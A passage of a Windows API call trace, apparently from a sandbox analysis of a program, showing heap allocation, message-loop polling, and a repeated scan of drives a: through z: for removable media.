(HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.795] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.795] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.795] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.795] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.795] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.796] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0216.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0216.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.796] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.796] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.796] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0216.796] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0216.796] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0216.796] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.796] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0216.796] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.796] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.797] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0216.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.797] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.797] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0216.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.798] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0216.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0216.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0216.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0216.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.798] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.798] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.798] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.799] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.799] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.799] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.799] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.799] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.799] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.800] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.800] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.800] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.800] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.800] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.801] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.801] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.801] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.801] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.801] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.802] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.802] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.802] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.802] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.802] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.803] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.803] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.803] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.803] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.803] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0216.803] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0216.803] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.803] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.803] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.803] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0216.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.804] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0216.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0216.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0216.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0216.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.804] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0216.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0216.805] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0216.805] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0216.805] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.807] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0216.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.807] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0216.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.807] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0216.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.807] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0216.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0216.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0216.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0216.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.808] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.808] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.808] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.809] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.809] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.809] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.809] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.809] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.810] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.810] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.810] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.810] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.810] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.811] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.811] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.811] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.811] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.811] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.812] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.812] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.812] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.812] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.812] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.813] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.813] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.813] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.813] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0216.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0216.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0216.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.814] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326120 [0216.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326120 | out: hHeap=0x12c0000) returned 1 [0216.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0216.815] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0216.815] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0216.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.816] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0216.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0216.816] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0216.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.816] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0216.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0216.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.816] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0216.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0216.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.817] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.817] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.817] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.817] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.817] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.818] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.818] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.818] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.818] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.818] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.819] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.819] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.819] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.819] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.819] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.820] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.820] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.820] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.820] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.820] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.821] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.821] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.821] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.821] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.821] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.822] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.822] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0216.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 